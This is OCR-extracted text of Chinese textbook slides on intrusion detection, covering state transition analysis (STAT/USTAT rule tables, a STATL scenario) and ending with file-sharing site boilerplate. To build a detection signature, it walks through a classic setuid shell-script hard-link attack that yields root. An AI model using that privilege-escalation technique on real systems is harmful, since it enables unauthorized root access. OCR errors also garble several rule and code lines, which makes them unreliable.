最能代表攻擊過程并同時引起系統(tǒng)狀態(tài)改變的關(guān)鍵
操作。對于每個具體的攻擊行為,都可能存在不同
的狀態(tài)轉(zhuǎn)移圖的表示方法。
對于每個狀態(tài)結(jié)點,都對應(yīng)著一組狀態(tài)斷言。
當(dāng)滿足該組斷言后,本次從上個狀態(tài)到本狀態(tài)的轉(zhuǎn)
移過程才成功發(fā)生。狀態(tài)斷言的選擇和關(guān)鍵行為的
選擇一樣,都是構(gòu)成狀態(tài)轉(zhuǎn)移圖的關(guān)鍵所在。
殄人民郵電出版袒入侵檢測流程66
費POSTS&lELECFM
下面以一個簡單的例子來展示狀態(tài)轉(zhuǎn)移圖的構(gòu)成
過程。該例子代表著UNIX環(huán)境下的一次攻擊
行為,其步驟如下:
%Intarget-x
%-x
入侵檢測流程67
多人民郵電出版社
K)SiS&IELECOMPRESS
這里,文件target代表一個setuid的shell腳本,其屬
主為根用戶(root)。文件target中首行包含字符串
“#!/bin/sh”。
上述的攻擊步驟過程說明如下:
①攻擊者對屬主為root且具有setuid特性的shell腳本
target,創(chuàng)建一個硬連接(hard-link)文件,該連接
文件的名稱以字符開頭。
多人民郵電出版社入侵檢測流程68
POS15&1ELECOMPRESS
②攻擊者執(zhí)行該連接文件“-X”。
為了創(chuàng)建對應(yīng)的狀態(tài)轉(zhuǎn)移圖,首先確定在
上述攻擊行為中,必須包含兩個關(guān)鍵的操作行
為:首先是用戶創(chuàng)建一個所需的文件,然后執(zhí)
行這個文件。兩個關(guān)鍵行為可以表示為
“CREATE”和“EXECUTE"。此時,對應(yīng)的不
完整狀態(tài)轉(zhuǎn)移圖如圖所示。
多人民郵電出版社入侵檢測流程69
費POSTS&1ELECCMPRESS
CreateFileExecuteFile
圖構(gòu)建狀態(tài)轉(zhuǎn)移圖Step-1
第二步,確定這些關(guān)鍵操作所引起的狀態(tài)變
化。對于第一個操作而言,并不需要任何前提狀態(tài)
條件,因此初始狀態(tài)為NULL。攻擊者執(zhí)行攻擊步
驟后,最后所導(dǎo)致的最終狀態(tài)是獲得了root的訪問
權(quán)限,即其有效用戶1ID(effectiveuserId)變?yōu)?/p>
rooto所以,最終狀態(tài)可以采用下面的斷言來定
義:
euid(user)=root
殄人民郵電出版袒入侵檢測流程70
費POSTS&lELECFM
接下來的問題就是如何確定中間狀態(tài),此時就要
用到前述對攻擊過程的分析知識了。
新創(chuàng)建的文件名稱應(yīng)該以開頭,后面接任意字
符串,表示為:
name(file)=-*
新創(chuàng)建的文件與所連接的目標(biāo)文件具有相同的屬主信
息,因此:
owner(file)=root
該連接文件應(yīng)該是一個具備setuid特性的腳本文件,
所以應(yīng)該滿足:
access(file,suid)=true
shell_script(file)=true
最后,顯而易見,該文件屬于連接文件,應(yīng)該滿足:
殄人民郵電出版袒入侵檢測流程71
費POSTS&lELECFM
link(file)=true
的過上面的分析,最終形成的狀態(tài)轉(zhuǎn)移圖如圖所
/J\O
owner(file)=root
access(file,suid)=TRUE
shell_script(file)=TRUE
link(file)=TRUE
圖最終的狀態(tài)轉(zhuǎn)移圖
人民郵電出版社入侵檢測流程72
H)S15&TELECOMPRESS
從上述的分析過程可以看出,構(gòu)建狀態(tài)轉(zhuǎn)移圖的過
程大致分為如下步驟:
①分析具體的攻擊行為,理解內(nèi)在機(jī)理。
②確定攻擊過程中的關(guān)鍵行為點。
③確定初始狀態(tài)和最終狀態(tài)。
④從最終狀態(tài)出發(fā),逐步確定所需的各個中間狀態(tài)
及其應(yīng)該滿足的狀態(tài)斷言組。
多人民郵電出版社入侵檢測流程73
審計記錄流
1
圖系統(tǒng)架構(gòu)示意圖入侵檢測流程
多人民郵電出版社STAT74
費POSTS&lELECFMPRESS
在圖4-7所示的STAT系統(tǒng)設(shè)計圖中,規(guī)則庫中的狀
態(tài)描述表和特征操作表是系統(tǒng)設(shè)計的核心內(nèi)容之
一。在早期的USTAT原型中,這兩張表都是用文本
文件的方式存儲在永久介質(zhì)上,然后再讀入到內(nèi)存
中形成對應(yīng)的數(shù)據(jù)結(jié)構(gòu)。
在狀態(tài)描述表中,對每個狀態(tài)轉(zhuǎn)移圖,都對應(yīng)一組
狀態(tài)斷言集合;每組斷言集合在文件中以字段串
“SDT;起頭(數(shù)字〃代表第〃個狀態(tài)轉(zhuǎn)移圖),下
接若干行斷言組,形式如下所示:
SDTn
State-listl.
State-list2.
經(jīng)人民郵電出版社入侵檢測流程75
費HISIS&TELECOMPRESS
每個斷言組State-list都包含若干個狀態(tài)斷言,表明
當(dāng)前狀態(tài)的情況。每行以和換行符結(jié)束。狀
態(tài)斷言之間以“$”符號連接表明邏輯“與”關(guān)
系,以符號連接表明邏輯“或”關(guān)系。在斷言
前加上關(guān)鍵字not,則表示對斷言值求反。
STAT的狀態(tài)描述表文件示例如下。
#STATEDESCRIPTIONTABLE
#FOR
#USTAT
#
#
#Unauthorizedaccesstouserprivileges
#StateDescription-1
#
SD1:
name(filel)=¬owner(filel)=USER&permitted(SUID,filel)
&shell_script(filel)&permitted(XGRP,filel)
|permitted(XOTH,file1).
:人民郵電出版社入侵檢測流程76
'K)S15&TELECOMPRESS
noteuid=USER.
#
特征操作表的結(jié)構(gòu)與狀態(tài)描述表類似,對于每個狀
態(tài)轉(zhuǎn)移圖,都對應(yīng)一組特征操作集合,形式如下所
示:
SIGn:
Action1;
Action2;
STAT的特征操作表文件示例如下。
#SIGNATUREACTIONSTABLE
#fbr
#USTAT
#
#Unauthorizedaccesstouserprivileges
#SignatureActions-1
#
SIGI:
hardlink(filel,file2).
Q~VQC11~i~Qfflel).
多人民郵電出版社入侵檢測流程77
rOSTS&TELECOMPRESS
#
#Unauthorizedaccesstouserprivileges
#SignatureActions-2
#
SIG2:
modify_perm(filel).
#
從狀態(tài)描述表和特征操作表的結(jié)構(gòu)可以看出,對于
每組狀態(tài)斷言而言,都對應(yīng)著一組特征操作。兩張
表之間存在著一一對應(yīng)的關(guān)系,其中每個特征操作
都對應(yīng)著用來表明某一個狀態(tài)的一組狀態(tài)斷言。
在后繼的STAT版本中,采用了STATL語言來描述
每一種攻擊過程所代表的狀態(tài)轉(zhuǎn)移圖。STATL語言
具備自己的語法和語義定義,但是其中最核心的概
念定義還是兩個:狀態(tài)和轉(zhuǎn)移。下面給出一個用
STATL語言表示攻擊過程的簡化例子。
殄人民郵電出版袒入侵檢測流程78
費POSTS&lELECFM
Scenarioexample
constintthreshold=64;
intcounter;
initial
statesi{}
states2
(
counter>threshold
{log("counteroverthreshold!!");}
transitiontl(sl->s2)
(
[READr]:r.euid!=r.uid
)
人民郵電出版社入侵檢測流程79
H)S15&TELECOMPKKSS
上例中,關(guān)鍵字Scenario定義了一個攻擊場景
example(即對應(yīng)一個STD),其中包括兩個狀態(tài)
定義si和s2,以及一個轉(zhuǎn)移定義tl(從狀態(tài)si到狀
態(tài)s2的轉(zhuǎn)移)。STATL語言中規(guī)定必須定義一個初
始狀態(tài),這里為si。狀態(tài)s2中存在一個斷言,而在
轉(zhuǎn)移tl中定義了一個特征操作r,并且要滿足特定條
件。
多人民郵電出版社入侵檢測流程80
POSTS&TELECOMPRESS
有色Petri網(wǎng)方法
開始狀態(tài)結(jié)束狀態(tài)
startaftersynafter_syn+ackafterack
多人民郵電出版社入侵檢測流程81
費IELECCMPKE5S
異常入侵檢測模型
口人民郵電出版衽入侵檢測流程82
rOSTS&TELECOMPRESS
異常檢測
異常檢測模型
:人民郵電出版社入侵檢測流程83
rOSTS&TELECOM
溫馨提示
- 1. 本站所有資源如無特殊說明,都需要本地電腦安裝OFFICE2007和PDF閱讀器。圖紙軟件為CAD,CAXA,PROE,UG,SolidWorks等.壓縮文件請下載最新的WinRAR軟件解壓。
- 2. 本站的文檔不包含任何第三方提供的附件圖紙等,如果需要附件,請聯(lián)系上傳者。文件的所有權(quán)益歸上傳用戶所有。
- 3. 本站RAR壓縮包中若帶圖紙,網(wǎng)頁內(nèi)容里面會有圖紙預(yù)覽,若沒有圖紙預(yù)覽就沒有圖紙。
- 4. 未經(jīng)權(quán)益所有人同意不得將文件中的內(nèi)容挪作商業(yè)或盈利用途。
- 5. 人人文庫網(wǎng)僅提供信息存儲空間,僅對用戶上傳內(nèi)容的表現(xiàn)方式做保護(hù)處理,對用戶上傳分享的文檔內(nèi)容本身不做任何修改或編輯,并不能對任何下載內(nèi)容負(fù)責(zé)。
- 6. 下載文件中如有侵權(quán)或不適當(dāng)內(nèi)容,請與我們聯(lián)系,我們立即糾正。
- 7. 本站不保證下載資源的準(zhǔn)確性、安全性和完整性, 同時也不承擔(dān)用戶因使用這些下載資源對自己和他人造成任何形式的傷害或損失。
最新文檔
- 中國公民健康素養(yǎng)66條解析-培訓(xùn)課件
- 廣西來賓市本年度(2025)小學(xué)一年級數(shù)學(xué)部編版能力評測((上下)學(xué)期)試卷及答案
- 2025-2030年中國數(shù)控電火花機(jī)床市場深度調(diào)研及投資潛力研究報告
- 中醫(yī)內(nèi)科學(xué)引言課件
- 叉車司機(jī)五級模擬題及參考答案
- 草坪建植與養(yǎng)護(hù)試題庫(附參考答案)
- 安徽省合肥市普通高中六校聯(lián)盟2024-2025學(xué)年高一下學(xué)期4月期中英語試題(原卷版+解析版)
- 航空飛行教具研究考核試卷
- 橡膠制品在太陽能設(shè)備中的功能考核試卷
- 硬件設(shè)計中的用戶體驗UX考量考核試卷
- VL3000系列高性能矢量型變頻器用戶手冊上海沃陸電氣有限公司
- 血液安全管理制度
- 2023年中國計量科學(xué)研究院招聘筆試真題
- 藥物中毒的護(hù)理診斷及護(hù)理措施
- 影視產(chǎn)業(yè)人才培養(yǎng)-洞察分析
- 2022年高考數(shù)學(xué)強(qiáng)基計劃講義共16個【學(xué)生版】
- 采購合規(guī)培訓(xùn)
- 安徽省森林撫育技術(shù)導(dǎo)則
- 樓宇保潔員工作流程和標(biāo)準(zhǔn)
- 南京信息工程大學(xué)《數(shù)理統(tǒng)計》2021-2022學(xué)年第一學(xué)期期末試卷
- 機(jī)場跑道瀝青混凝土施工工藝及方案
評論
0/150
提交評論